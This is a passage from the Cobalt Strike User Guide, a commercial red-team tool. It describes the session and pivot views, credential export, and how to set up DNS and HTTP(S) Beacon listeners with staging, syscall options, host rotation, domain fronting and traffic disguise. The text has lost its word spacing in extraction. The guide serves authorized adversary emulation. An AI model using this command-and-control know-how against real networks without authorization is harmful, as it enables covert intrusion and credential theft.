UserInterface/SessionandTargetVisualizations ShowSessioninTableView ShowTargetsinTableView ManageWebServer ViewCredentials ViewDownloadFiles ViewKeystrokes ViewScreenshots Session and Target Visualizations CobaltStrikehasseveralvisualizationseachdesignedtoaidadifferentpartofyour engagement.Youmayswitchbetweenvisualizationsthrough(PivotGraph,SessionTable, TargetTable)buttons onthetoolbarortheCobalt Strike ->Visualization menu. Pivot Graph CobaltStrikehastheabilitytolinkmultipleBeaconsintoachain.TheselinkedBeaconsreceive theircommandsandsendtheiroutputthroughtheparentBeaconintheirchain.Thistypeof chainingisusefultocontrolwhichsessionsegressanetworkandtoemulateadisciplinedactor whorestrictstheircommunicationpathsinsideofanetworktosomethingplausible.This chainingofBeaconsisoneofthemostpowerfulfeaturesinCobaltStrike. CobaltStrike’sworkflowsmakethischainingveryeasy.It’snotuncommonforCobaltStrike operatorstochainBeaconsfourorfivelevelsdeeponaregularbasis.Withoutavisualaidit’s verydifficulttokeeptrackofandunderstandthesechains.ThisiswherethePivotGraphcomes in. ThePivotGraphshowsyourBeaconchainsinanaturalway.EachBeaconsessionhasanicon. Aswiththesessionstable:theiconforeachhostindicatesitsoperatingsystem.Iftheiconis redwithlightningbolts,theBeaconisrunninginaprocesswithadministratorprivileges.A darkericonindicatesthattheBeaconsessionwasaskedtoexitanditacknowledgedthis command. ThefirewalliconrepresentstheegresspointofyourBeaconpayload.Adashed green line indicatestheuseofbeaconingHTTPorHTTPSconnectionstoleavethenetwork.Ayellow dashed line indicatestheuseofDNStoleavethenetwork. CobaltStrikeUserGuide www.fortra.com page:29
UserInterface/SessionandTargetVisualizations figure12-CobaltStrikeGraphView AnarrowconnectingoneBeaconsessiontoanotherrepresentsalinkbetweentwoBeacons. CobaltStrike’sBeaconusesWindowsnamedpipesandTCPsocketstocontrolBeaconsinthis peer-to-peerfashion.Anorange arrow isanamedpipechannel.SSHsessionsuseanorange arrowaswell.Ablue arrow isaTCPsocketchannel.Ared (namedpipe)orpurple (TCP)arrow indicatesthataBeaconlinkisbroken. ClickaBeacontoselectit.YoumayselectmultipleBeaconsbyclickinganddraggingaboxover thedesiredhosts.PressCtrlandShiftandclicktoselectorunselectanindividualBeacon. Right-clickaBeacontobringupamenuwithavailablepost-exploitationoptions. SeveralkeyboardshortcutsareavailableinthePivotGraph. l Ctrl+Plus —zoom in l Ctrl+Minus —zoom out l Ctrl+0 —resetthezoom level l Ctrl+A —selectallhosts l Escape —clearselection l Ctrl+C —arrangehostsintoacircle l Ctrl+S —arrangehostsintoastack l Ctrl+H —arrangehostsintoahierarchy. Right-clickthePivotGraphwithnoselectedBeaconstoconfigurethelayoutofthisgraph.This menualsohasanUnlinkedmenu.SelectHide tohideunlinkedsessionsinthepivotgraph. SelectShow toshowunlinkedsessionsagain. Sessions Table CobaltStrikeUserGuide www.fortra.com page:30
UserInterface/SessionandTargetVisualizations ThesessionstableshowswhichBeaconsarecallinghometothisCobaltStrikeinstance. BeaconisCobaltStrike’spayloadtoemulateadvancedthreatactors.Here,youwillseethe externalIPaddressofeachBeacon,theinternalIPaddress,theegresslistenerforthatBeacon, whentheBeaconlastcalledhome,andotherinformation.Nexttoeachrowisaniconindicating theoperatingsystemofthecompromisedtarget.Iftheiconisredwithlightningbolts,the Beaconisrunninginaprocesswithadministratorprivileges.Afadediconindicatesthatthe Beaconsessionwasaskedtoexitanditacknowledgedthiscommand. figure13-CobaltStrikeBeaconManagementTool IfyouuseaDNSBeaconlistener,beawarethatCobaltStrikewillnotknowanythingabouta hostuntilitchecksinforthefirsttime.Ifyouseeanentrywithalastcalltimeandthat’sit,you willneedtogivethatBeaconitsfirsttasktoseemoreinformation. Right-clickoneormoreBeacon’stoseeyourpost-exploitationoptions. Targets Table TheTargetsTableshowsthetargetsinCobaltStrike’sdatamodel.Thetargetstabledisplays theIPaddressofeachtarget,itsNetBIOSname,andanotethatyouoroneofyourteam membersassignedtothetarget.Theicontotheleftofatargetindicatesitsoperatingsystem.A rediconwithlightningboltsindicatesthatthetargethasaCobaltStrikeBeaconsession associatedwithit. figure14-CobaltStrikeTargetsView Clickanyofthetableheaderstosortthehosts.Highlightarowandright-clickittobringupa menuwithoptionsforthathost.PressCtrlandAltandclicktoselectanddeselectindividual hosts. Thetarget’stableisausefulforlateralmovementandtounderstandyourtarget’snetwork. CobaltStrikeUserGuide www.fortra.com page:31
UserInterface/Tabs Tabs CobaltStrikeopenseachdialog,console,andtableinatab.ClicktheX buttontocloseatab. UseCtrl+D toclosetheactivetab.Ctrl+Shift+D willclosealltabsexcepttheactiveon. Youmayright-clicktheX buttontoopenatabinawindow,takeascreenshotofatab,orclose alltabswiththesamename. Keyboardshortcutsexistforthesefunctionstoo.UseCtrl+W toopentheactivetabinitsown window.UseCtrl+T toquicklysaveascreenshotoftheactivetab. Ctrl+B willsendthecurrenttabtothebottomoftheCobaltStrikewindow.Thisisusefulfortabs thatyouneedtoconstantlywatch.Ctrl+E willundothisactionandremovethetabatthe bottomoftheCobaltStrikewindow. HoldshiftandclickX toclosealltabswiththesamename.Holdshift+controlandclickX to openthetabinitsownwindow. UseCtrl+Left andCtrl+Right toquicklyswitchtabs.Youmaydraganddroptabstochange theirorder. TIP: ThefulllistofDefaultKeyboardShortcutsareavailablefromthemenu(Help -> Default Keyboard Shortcuts). Consoles CobaltStrikeprovidesaconsoletointeractwithBeaconsessions,scripts,andchatwithyour teammates. figure15-AConsoleTab CobaltStrikeUserGuide www.fortra.com page:32
UserInterface/Tables Theconsolestrackyourcommandhistory.Usetheup arrow tocyclethroughpreviouslytyped commands.Thedown arrow movesbacktothelastcommandyoutyped.Thehistory commandlistspreviouslytypedcommands.The!commandallowspreviouslytyped commandstoberanagain. NOTE: Thelistofpreviouslytypedcommandsisnotmaintainedbetweensessions.Closinga consolewindowandthenreopeningitwillstartwithnopreviouslytypedcommands. UsetheTab keytocompletecommandsandparameters. UseCtrl+Plus tomaketheconsolefontsizelarger,Ctrl+Minus tomakeitsmaller,andCtrl+0 toresetit.Thischangeislocaltothecurrentconsoleonly.VisitCobalt Strike ->Preferences to permanentlychangethefont. PressCtrl+F toshowapanelthatwillletyousearchfortextwithintheconsole.UseCtrl+A to selectalltextintheconsole’sbuffer. TIP: ThefulllistofDefaultKeyboardShortcutsareavailablefromthemenu(Help -> Default Keyboard Shortcuts). Tables CobaltStrikeusestablestodisplaysessions,credentials,targets,andotherengagement information. MosttablesinCobaltStrikehaveanoptiontoassignacolorhighlighttothehighlightedrows. ThesehighlightsarevisibletootherCobaltStrikeclients.Right-clickandlookfortheColor menu. PressCtrl+F withinatabletoshowthetablesearchpanel.Thisfeatureletsyoufilterthecurrent table. CobaltStrikeUserGuide www.fortra.com page:33
UserInterface/KeyboardShortcuts figure16-TablewithSearchPanel Thetextfieldiswhereyoutypeyourfiltercriteria.Theformatofthecriteriadependsonthe columnyouchoosetoapplythefilterto.UseCIDR notation(e.g.,192.168.1.0/24)andhost ranges(192.168.1-192.169.200)tofiltercolumnsthatcontainaddresses.Usenumbersor rangesofnumbersforcolumnsthatcontainnumbers.Usewildcardcharacters(*,?)tofilter columnsthatcontainstrings. The! buttonnegatesthecurrentcriteria.Pressenter toapplythespecifiedcriteriatothecurrent table.Youmaystackasmanycriteriatogetherasyoulike.TheReset buttonwillremovethe filtersappliedtothecurrenttable. Keyboard Shortcuts Therearemanydefaultkeyboardshortcutsavailabletoyouwhenworkingintheuserinterface. SomecanbeusedanywherewhileothersarespecifictodifferentareasoftheUI.Fromthe menu,selectingHelp -> Default Keyboard Shortcutsopensthefollowingreferencedialog: CobaltStrikeUserGuide www.fortra.com page:34
UserInterface/KeyboardShortcuts figure17-DefaultKeyboardShortcuts TheAggressorfunction,openDefaultShortcutsDialog,canalsobeusedtoopenthesamelist. CobaltStrikeUserGuide www.fortra.com page:35
DataManagement/Overview Data Management Overview CobaltStrike’steamserverisabrokerforinformationcollectedbyCobaltStrikeduringyour engagement.CobaltStrikeparsesoutputfromitsBeaconpayloadtoextracttargets,services, andcredentials. Ifyou’dliketoexportCobaltStrike’sdata,youmaydosothroughReporting ->Export Data. CobaltStrikeprovidesoptionstoexportitsdataasTSVandXMLfiles.TheCobaltStrikeclient’s exportdatafeaturemergesdatafromalloftheteamserversyou’recurrentlyconnectedtoand exportTSVandXMLfileswithdatainCobaltStrike'sdatamodel.. Targets YoumayinteractwithCobaltStrike’stargetinformationthroughView ->Targets.Thistab displaysthesameinformationastheTargetsVisualization. PressImport toimportafilewithtargetinformation.CobaltStrikeacceptsflattextfileswithone hostperline.ItalsoacceptsXMLfilesgeneratedbyNmap(the–oXoption). PressAdd toaddnewtargetstoCobaltStrike’sdatamodel. CobaltStrikeUserGuide www.fortra.com page:36
DataManagement/Services figure18-AddaTarget ThisdialogallowsyoutoaddmultiplehoststoCobaltStrike’sdatabase.SpecifyarangeofIP addressesoruseCIDR notationintheAddressfieldtoaddmultiplehostsatonetime.Hold downshiftwhenyouclickSavetoaddhoststothedatamodelandkeepthisdialogopen. Selectoneormorehostsandright-clicktobringupthehostsmenu.Thismenuiswhereyou changethenoteonthehosts,settheiroperatingsysteminformation,orremovethehostsfrom thedatamodel. Services Fromatargetsdisplay,right-clickahost,andselectServices.ThiswillopenCobaltStrike’s servicesbrowser.Hereyoumaybrowseservices,assignnotestodifferentservices,andremove serviceentriesaswell. figure19-TheServicesDialog Credentials GotoView ->Credentials tointeractwithCobaltStrike’scredentialmodel. PressAdd toaddanentrytothecredentialmodel.Again,youmayholdshiftandpressSave to keepthedialogopenandmakeiteasiertoaddnewcredentialstothemodel. PressCopy tocopythehighlightedentriestoyourclipboard. UseExport toexportcredentialsinPWDumpformat. figure20-TheCredentialModel CobaltStrikeUserGuide www.fortra.com page:37
DataManagement/Maintenance Maintenance CobaltStrike’sdatamodelkeepsallofitsstateandstatemetadatainthedata/folder.This folderexistsinthefolderyourantheCobaltStriketeamserverfrom. ToclearCobaltStrike’sdatamodel:stoptheteamserver,deletethedata/folder,andits contents.CobaltStrikewillrecreatethedata/folderwhenyoustarttheteamservernext. Ifyou’dliketoarchivethedatamodel,stoptheteamserver,anduseyourfavoriteprogramto storethedata/folderanditsfileselsewhere.Torestorethedatamodel,stoptheteamserver, andrestoretheoldcontenttothedata/folder. Reporting ->Reset Data resetsCobaltStrike’sDataModelwithoutateamserverrestart. Clearing Team Server Data Anewscripthasbeenaddedfortheteamserverwhichclearsthedataandstatefromthe TeamServertoreturnittoadefaultstate.Enterthefollowingcommand: ./clearteamserverdata AwarningwilldisplayandyouwillhavetoenterCLEAR forthecommandtocontinue. Theerrorsshownaretobeexpectedwhenthefolderstobedeleteddonotexist.Inthiscase therearenodownloads,screenshotsoruploadsfolderssotheycouldnotbedeleted.Anyfiles offolderswhichcouldnotbedeletedwillbelisted. CobaltStrikeUserGuide www.fortra.com page:38
ListenerandInfrastructureManagement/Overview Listener and Infrastructure Management Overview Thefirststepofanyengagementistosetupinfrastructure.InCobaltStrike’scase, infrastructureconsistsofoneormoreteamservers,redirectors,andDNSrecordsthatpointto yourteamserversandredirectors.Onceyouhaveateamserverupandrunning,youwillwant toconnecttoit,andconfigureittoreceiveconnectionsfromcompromisedsystems.Listeners areCobaltStrike’smechanismtodothis. AlistenerissimultaneouslyconfigurationinformationforapayloadandadirectiveforCobalt Striketostandupaservertoreceiveconnectionsfromthatpayload.Alistenerconsistsofa user-definedname,thetypeofpayload,andseveralpayload-specificoptions. Listener Management TomanageCobaltStrikelisteners,gotoCobalt Strike ->Listeners.Thiswillopenatablisting allofyourconfiguredpayloadsandlisteners. figure21-ListenerManagementTab PressAdd tocreateanewlistener.TheNewListenerpaneldisplays. CobaltStrikeUserGuide www.fortra.com page:39
ListenerandInfrastructureManagement/ListenerManagement figure22-NewListenerPanel UsethePayloaddrop-downtoselectoneoftheavailablepayload/listenertypesyouwishto configure.Eachhasdifferentparametersandaredescribedinthefollowingsections: DNS Beacon on page 44 HTTP Beacon and HTTPS Beacon on page 50 SMB Beacon on page 56 TCP Beacon on page 59 CobaltStrikeUserGuide www.fortra.com page:40
ListenerandInfrastructureManagement/CobaltStrike’sBeaconPayload External C2 on page 62 Foreign Listeners on page 64 Toeditalistener,highlightalistenerandpressEdit.Toremovealistener,highlightthelistener andpressRemove. Cobalt Strike’s Beacon Payload Mostcommonly,youwillconfigurelistenersforCobaltStrike’sBeaconpayload.Beaconis CobaltStrike’spayloadtomodeladvancedattackers.UseBeacontoegressanetworkover HTTP,HTTPS,orDNS.Youmayalsolimitwhichhostsegressanetworkbycontrollingpeer-to- peerBeaconsoverWindowsnamedpipesandTCPsockets. Beaconisflexibleandsupportsasynchronousandinteractivecommunication.Asynchronous communicationislowandslow.Beaconwillphonehome,downloaditstasks,andgotosleep. Interactivecommunicationhappensinreal-time. Beacon’snetworkindicatorsaremalleable.RedefineBeacon’scommunicationwithCobalt Strike’smalleableC2language.ThisallowsyoutocloakBeaconactivitytolooklikeother malwareorblend-inaslegitimatetraffic.SeeMalleable Command and Control on page 129 formoreinformation. System Calls TheBeaconpayloadhasimplementedtheabilitytousesystemcallsinsteadofthestandard WindowsAPIfunctions.CurrentlyBeaconsupportsalimitedsetoffunctionsforthiscapability. Thefollowingfunctionssupporttheuseofsystemcalls: l CloseHandle l CreateFileMapping l CreateRemoteThread l CreateThread l DuplicateHandle l GetThreadContext l MapViewOfFile l OpenProcess l OpenThread l ReadProcessMemory CobaltStrikeUserGuide www.fortra.com page:41
ListenerandInfrastructureManagement/CobaltStrike’sBeaconPayload l ResumeThread l SetThreadContext l UnmapViewOfFile l VirtualAlloc l VirtualAllocEx l VirtualFree l VirtualProtect l VirtualProtectEx l VirtualQuery l WriteProcessMemory WhenyougenerateastagelessbeaconpayloadfromtheCobaltStrikeUIorasupported aggressorfunction,youcanchoosewhichsystemcallmethodwillbeusedatexecutiontime. System Call Method Description None UsethestandardWindowsAPIfunction Direct UsetheNtversionofthefunction Indirect JumptotheappropriateinstructionwithintheNt versionofthefunction Therearesomecommandsandworkflowsthatinjectorspawnanewbeaconthatdonotallow youtosettheinitialsystemcallmethod.Inthesecases,settingthe‘stage.syscall_method’ settingintheprofilewillallowyoutocontroltheinitialmethodusedatexecutiontime. Thefollowingcommandsandworkflowsusethestage.syscall_methodsetting: l elevate l inject l jump l spawn l spawnas l spawnu l team serverrespondingtoastagelesspayloadrequest l team serverrespondingtoanexternalc2payloadrequest Usethesyscall-method [method]commandtomodifywhichmethodwillbeusedfor subsequentcommands.Inaddition,syscall-methodwithoutanyargumentswillquerythe currentmethod. CobaltStrikeUserGuide www.fortra.com page:42
ListenerandInfrastructureManagement/PayloadStaging Payload Security Features CobaltStriketakesstepstoprotectBeaconscommunicationandtoensurethataBeaconcan onlyreceivetasksfromandsendoutputtoitsteamserver. WhenyousetuptheBeaconpayloadforthefirsttime,CobaltStrikewillgeneratea public/privatekeypairthatisuniquetoyourteamserver.Theteamserver’spublickeyis embeddedintoBeacon’spayloadstage.Beaconusestheteamserver’spublickeytoencrypt sessionmetadatathatitsendstotheteamserver. Beaconmustalwayssendsessionmetadatabeforetheteamservercanissuetasksand receiveoutputfromtheBeaconsession.Thismetadatacontainsarandomsessionkey generatedbythatBeacon.TheteamserveruseseachBeacon’ssessionkeytoencrypttasks andtodecryptoutput. EachBeaconimplementationanddatachannelusesthissamescheme.Youhavethesame securitywiththeArecorddatachannelintheHybridHTTPandDNSBeaconasyoudowiththe HTTPSBeacon. BeawarethattheaboveappliestoBeacononceitisstaged.Thepayloadstagers,duetotheir size,donothavebuilt-insecurityfeatures. Payload Staging Onetopicthatdeservesmention,asbackgroundinformation,ispayloadingstaging.Many attackframeworksdecoupletheattackfromthestuffthattheattackexecutes.Thisstuffthat anattackexecutesisknownasapayload.Payloadsareoftendividedintotwoparts:thepayload stageandthepayloadstager.Astagerisasmallprogram,usuallyhand-optimizedassembly, thatdownloadsapayloadstage,injectsitintomemory,andpassesexecutiontoit.Thisprocess isknownasstaging. Thestagingprocessisnecessaryinsomeoffenseactions.Manyattackshavehardlimitson howmuchdatatheycanloadintomemoryandexecuteaftersuccessfulexploitation.This greatlylimitsyourpost-exploitationoptions,unlessyoudeliveryourpost-exploitationpayloadin stages. CobaltStrikedoesusestaginginitsuser-drivenattacks.Thesearemostoftheitemsunder PayloadsandAttacks.Thestagersusedintheseplacesdependonthepayloadpairedwiththe attack.Forexample,theHTTPBeaconhasanHTTPstager.TheDNSBeaconhasaDNSTXT recordstager.Notallpayloadshavestageroptions.Payloadswithnostagercannotbe deliveredwiththeseattackoptions. Ifyoudon’tneedpayloadstaging,youcanturnitoff.Setthehost_stage optioninyour MalleableC2profiletofalse.ThiswillpreventCobaltStrikefromhostingpayloadstagesonits CobaltStrikeUserGuide www.fortra.com page:43
ListenerandInfrastructureManagement/DNSBeacon webandDNSservers.ThereisabigOPSECbenefittodoingthis.Withstagingon,anyonecan connecttoyourserver,requestapayload,andanalyzeitscontentstofindinformationfrom yourpayloadconfiguration. InCobaltStrike4.0andlater,post-exploitationandlateralmovementactionseschewstagers andopttodeliverafullpayloadwherepossible.Ifyoudisablepayloadstaging,youshouldn’t noticeitonceyou’rereadytodopost-exploitation. DNS Beacon TheDNSBeaconisafavoriteCobaltStrikefeature.ThispayloadusesDNSrequeststobeacon backtoyou.TheseDNSrequestsarelookupsagainstdomainsthatyourCobaltStriketeam serverisauthoritativefor.TheDNSresponsetellsBeacontogotosleeportoconnecttoyouto downloadtasks.TheDNSresponsewillalsotelltheBeaconhowtodownloadtasksfromyour teamserver. figure23-DNSBeaconinAction InCobaltStrike4.0andlater,theDNSBeaconisaDNS-onlypayload.ThereisnoHTTP communicationmodeinthispayload.Thisisachangefrompriorversionsoftheproduct. Data Channels Today,theDNSBeaconcandownloadtasksoverDNSTXTrecords,DNSAAAArecords,orDNS Arecords.Thispayloadhastheflexibilitytochangebetweenthesedatachannelswhileitson target.UseBeacon’smodecommandtochangethecurrentBeacon’sdatachannel.mode dns CobaltStrikeUserGuide www.fortra.com page:44
ListenerandInfrastructureManagement/DNSBeacon istheDNSArecorddatachannel.mode dns6 istheDNSAAAArecordchannel.And,mode dns- txt istheDNSTXTrecorddatachannel.ThedefaultistheDNSTXTrecorddatachannel. BeawarethatDNSBeacondoesnotcheckinuntilthere’sataskavailable.Usethecheckin commandtorequestthattheDNSBeaconcheckinnexttimeitcallshome. DNS Listener Setup TocreateaDNSBeaconlistenerselectCobalt Strike -> Listenersonthemainmenuandpress theAddbuttonatthebottomoftheListenerstabdisplay. TheNewListenerpaneldisplays. CobaltStrikeUserGuide www.fortra.com page:45
ListenerandInfrastructureManagement/DNSBeacon figure24-DNSBeaconOptions SelectBeacon DNSasthePayloadtypeandgivethelisteneraName.Makesuretogivethe newlisteneramemorablenameasthisnameishowyouwillrefertothislistenerthrough CobaltStrike’scommandsandworkflows. Parameters CobaltStrikeUserGuide www.fortra.com page:46
ListenerandInfrastructureManagement/DNSBeacon DNS Hosts-Press[+] toaddoneormoredomainstobeaconto.YourCobaltStrike teamserversystemmustbeauthoritativeforthedomainsyouspecify.Createa DNSArecordandpointittoyourCobaltStriketeamserver.UseDNSNSrecords todelegateseveraldomainsorsub-domainstoyourCobaltStriketeamserver’sA record. Thelengthofthebeaconhostlistinbeaconpayloadislimitedto255characters. ThisincludesarandomlyassignedURIforeachhostanddelimitersbetween eachiteminthelist.Ifthelengthisexceeded,hostswillbedroppedfromtheend ofthelistuntilitfitsinthespace.Therewillbemessagesintheteamserverlog fordroppedhosts. Host Rotation Strategy-Thisvalueconfiguresthebeaconsbehaviorforchoosing whichhost(s)fromthelisttouseforegress.Selectoneofthefollowing: round-robin:Selecttoloopthroughthelistofhostnamesintheordertheyare provided.Eachhostisusedforoneconnection. random:Selecttorandomlyselectahostnamefromthelisteachtimea connectionisattempted. failover-xx:Selecttouseaworkinghostaslongaspossible.Useeachhostinthe listuntiltheyreachaconsecutivefailovercount(x)ordurationtimeperiod (m,h,d),thenusethenexthost. rotate-xx:Selecttouseeachhostforaperiodoftime.Useeachhostinthelistfor thespecifiedduration(m,h,d),thenusethenexthost. Max Retry Stategy-Thisconfiguresthebeaconsbehaviorforexitingafteranumberof consecutivefailedconnectionattemptstotheTeamServer.Thereareseveral defaultoptionstochoosefromoryoucancreateyourownlistwiththe LISTENER_MAX_RETRY_STRATEGIEShook.SeeLISTENER_MAX_RETRY_ STRATEGIES on page 227. none:Selecttoensurebeaconwillnotexitbecauseoffailedconnectionattempts. exit-xxx:Thesesettingsusethesyntaxofexit-[max_attempts]-[increase_ attempts]-[duration][m,h,d].Themax_attemptvalueisthenumberof consecutivefailedattemptsbeforebeaconwillexit.Theincrease_attemptsis thenumberofconsecutivefailedattemptsbeforeincreasingthesleeptime. Thedurationvalueisthenumberofminutes,hours,ordaystosetthenew sleeptime. CobaltStrikeUserGuide www.fortra.com page:47
ListenerandInfrastructureManagement/DNSBeacon Thesleeptimewillnotbeupdatedifthecurrentsleeptimeisgreaterthanthe newlyspecifieddurationvalue.Thesleeptimewillbeaffectedbythecurrent jittervalue.Onanysuccessfulconnectionthefailedattemptscountwillbe resettozeroandthesleeptimewillberesettothepriorvalue. DNS Host (Stager) -ThisconfigurestheDNSBeacon’sTXTrecordstager.Thisstager isonlyusedwithCobaltStrikefeaturesthatrequireanexplicitstager.YourCobalt Striketeamserversystemmustbeauthoritativeforthisdomainaswell. Profile -AllowsabeacontobeconfiguredwithaselectedMalleableC2profilevariant. DNS Port (Bind)-ThisfieldspecifiestheportyourDNSBeaconpayloadserverwill bindto.Thisoptionisusefulifyouwanttosetupportbendingredirectorsuchas aredirectorthatacceptsconnectionsonport53butroutestheconnectionto yourteamserveronanotherport. DNS Resolver -AllowsaDNSBeacontoegressusingaspecificDNSresolver,rather thanusingthedefaultDNSresolverforthetargetserver.SpecifytheIPAddress ofthedesiredresolver.ThisDNSResolverisnotusedbythestageroftheDNS Beacon. Guardrails -BeaconGuardrailsallowstheusertocreateawaytorestrictthetargets thatthebeaconcanexecuteon.Onceconfigured,thesevalueswillbethedefault guardrailfortheStagelessorWindowsStagelessPayloadGenerators. Pressthe...buttontoopentheGuardrailsSettings: figure25-GuardrailSettings CobaltStrikeUserGuide www.fortra.com page:48
ListenerandInfrastructureManagement/DNSBeacon IP Address:EnteraspecificIPAddressorgenericwildcardoftherightmost segments.Forexample: l 123.123.123.123 l 123.123.123.* l 123.123.. l 123...* User Name:Enteraspecificname,oravaluethat: l “startswith”supportedby“”wildcardcharacterontherightside l “endswith”supportedby“”wildcardcharacterontheleftside Theguardiscase-insensitive. Server Name:Enteraspecificcomputername,oravaluethat: l “startswith”supportedby“”wildcardcharacterontherightside l “endswith”supportedby“”wildcardcharacterontheleftside Theguardiscase-insensitive Domain:Enteraspecificdomain,oravaluethat: l “startswith”supportedby“”wildcardcharacterontherightside l “endswith”supportedby“”wildcardcharacterontheleftside Theguardiscase-insensitive Testing TotestyourDNSconfiguration,openaterminalandtypenslookup jibberish.beacon domain. IfyougetanArecordreplyof0.0.0.0—thenyourDNSiscorrectlysetup.Ifyoudonotgetareply, thenyourDNSconfigurationisnotcorrectandtheDNSBeaconwillnotcommunicatewithyou. Notes l MakesureyourDNSrecordsreferencetheprimaryaddressonyournetworkinterface. CobaltStrike’sDNSserverwillalwayssendresponsesfrom yournetworkinterface’s primaryaddress.DNSresolverstendtodropreplieswhentheyrequestinformationfrom oneserver,butreceiveareplyfrom another. CobaltStrikeUserGuide www.fortra.com page:49
ListenerandInfrastructureManagement/HTTPBeaconandHTTPSBeacon l IfyouarebehindaNATdevice,makesurethatyouuseyourpublicIPaddressfortheNS recordandsetyourfirewalltoforwardUDPtrafficonport53toyoursystem.Cobalt StrikeincludesaDNSservertocontrolBeacon. l TocustomizethenetworktrafficindicatorsforyourDNSbeacons,seeDNS Beacons on page 148intheMalleableC2help. HTTP Beacon and HTTPS Beacon TheHTTPandHTTPSbeaconsdownloadtaskswithanHTTPGETrequest.Thesebeacons senddatabackwithanHTTPPOSTrequest.Thisisthedefault.Youhaveincrediblecontrolover thebehaviorandindicatorsinthispayloadviaMalleableC2. HTTP(S)Listener Setup TocreateaHTTPorHTTPSBeaconlistenerselectCobalt Strike -> Listenersonthemain menuandpresstheAddbuttonatthebottomoftheListenerstabdisplay. TheNewListenerpaneldisplays. CobaltStrikeUserGuide www.fortra.com page:50
ListenerandInfrastructureManagement/HTTPBeaconandHTTPSBeacon figure26-HTTPBeaconOptions SelectBeacon HTTPorBeacon HTTPSasthePayloadtypeandgivethelisteneraName. Makesuretogivethenewlisteneramemorablenameasthisnameishowyouwillrefertothis listenerthroughCobaltStrike’scommandsandworkflows. Parameters CobaltStrikeUserGuide www.fortra.com page:51
ListenerandInfrastructureManagement/HTTPBeaconandHTTPSBeacon HTTP(S) Hosts-Press[+] toaddoneormorehostsfortheHTTPBeacontocallhome to.Press[-]toremoveoneormorehosts.Press[X]toclearthecurrenthosts.If youhavemultiplehosts,youcanstillpasteacomma-separatedlistofcallback hostsintothisdialog. Thelengthofthebeaconhostlistinbeaconpayloadislimitedto255characters. ThisincludesarandomlyassignedURIforeachhostanddelimitersbetween eachiteminthelist.Ifthelengthisexceeded,hostswillbedroppedfromtheend ofthelistuntilitfitsinthespace.Therewillbemessagesintheteamserverlog fordroppedhosts. Host Rotation Strategy-Thisvalueconfiguresthebeaconsbehaviorforchoosing whichhost(s)fromthelisttouseforegress.Selectoneofthefollowing: round-robin:Selecttoloopthroughthelistofhostnamesintheordertheyare provided.Eachhostisusedforoneconnection. random:Selecttorandomlyselectahostnamefromthelisteachtimea connectionisattempted. failover-xx:Selecttouseaworkinghostaslongaspossible.Useeachhostinthe listuntiltheyreachaconsecutivefailovercount(x)ordurationtimeperiod (m,h,d),thenusethenexthost. rotate-xx:Selecttouseeachhostforaperiodoftime.Useeachhostinthelistfor thespecifiedduration(m,h,d),thenusethenexthost. Max Retry Stategy-Thisconfiguresthebeaconsbehaviorforexitingafteranumberof consecutivefailedconnectionattemptstotheTeamServer.Thereareseveral defaultoptionstochoosefromoryoucancreateyourownlistwiththe LISTENER_MAX_RETRY_STRATEGIEShook.SeeLISTENER_MAX_RETRY_ STRATEGIES on page 227. none:Selecttoensurebeaconwillnotexitbecauseoffailedconnectionattempts. exit-xxx:Thesesettingsusethesyntaxofexit-[max_attempts]-[increase_ attempts]-[duration][m,h,d].Themax_attemptvalueisthenumberof consecutivefailedattemptsbeforebeaconwillexit.Theincrease_attemptsis thenumberofconsecutivefailedattemptsbeforeincreasingthesleeptime. Thedurationvalueisthenumberofminutes,hours,ordaystosetthenew sleeptime. CobaltStrikeUserGuide www.fortra.com page:52
ListenerandInfrastructureManagement/HTTPBeaconandHTTPSBeacon Thesleeptimewillnotbeupdatedifthecurrentsleeptimeisgreaterthanthe newlyspecifieddurationvalue.Thesleeptimewillbeaffectedbythecurrent jittervalue.Onanysuccessfulconnectionthefailedattemptscountwillbe resettozeroandthesleeptimewillberesettothepriorvalue. HTTP Host (Stager)-ThiscontrolsthehostoftheHTTPStagerfortheHTTPBeacon. Thisvalueisonlyusedifyoupairthispayloadwithanattackthatrequiresan explicitstager. Profile-ThisiswhereyouselectaMalleableC2profilevariant.Avariantisawayof specifyingmultipleprofilevariationsinonefile.Withvariants,eachHTTPor HTTPSlisteneryousetupcanhavedifferentnetworkindicators. HTTP Port (C2)-ThisfieldsetstheportyourHTTPBeaconwillphonehometo. HTTP Port (Bind)-ThisfieldspecifiestheportyourHTTPBeaconpayloadwebserver willbindto.Theseoptionsareusefulifyouwanttosetupportbendingredirectors (e.g.,aredirectorthatacceptsconnectionsonport80or443butroutesthe connectiontoyourteamserveronanotherport). HTTP Host Header-Thisvalue,ifspecified,ispropagatedtoyourHTTPstagersand throughyourHTTPcommunication.Thisoptionmakesiteasiertotake advantageofdomainfrontingwithCobaltStrike. HTTP Proxy-Pressthe… buttontospecifyanexplicitproxyconfigurationforthis payload. Guardrails -BeaconGuardrailsallowstheusertocreateawaytorestrictthetargets thatthebeaconcanexecuteon.Onceconfigured,thesevalueswillbethedefault guardrailfortheStagelessorWindowsStagelessPayloadGenerators. Pressthe...buttontoopentheGuardrailsSettings: CobaltStrikeUserGuide www.fortra.com page:53
ListenerandInfrastructureManagement/HTTPBeaconandHTTPSBeacon figure27-GuardrailSettings IP Address:EnteraspecificIPAddressorgenericwildcardoftherightmost segments.Forexample: l 123.123.123.123 l 123.123.123.* l 123.123.. l 123...* User Name:Enteraspecificname,oravaluethat: l “startswith”supportedby“”wildcardcharacterontherightside l “endswith”supportedby“”wildcardcharacterontheleftside Theguardiscase-insensitive. Server Name:Enteraspecificcomputername,oravaluethat: l “startswith”supportedby“”wildcardcharacterontherightside l “endswith”supportedby“”wildcardcharacterontheleftside Theguardiscase-insensitive Domain:Enteraspecificdomain,oravaluethat: l “startswith”supportedby“”wildcardcharacterontherightside l “endswith”supportedby“”wildcardcharacterontheleftside Theguardiscase-insensitive CobaltStrikeUserGuide www.fortra.com page:54
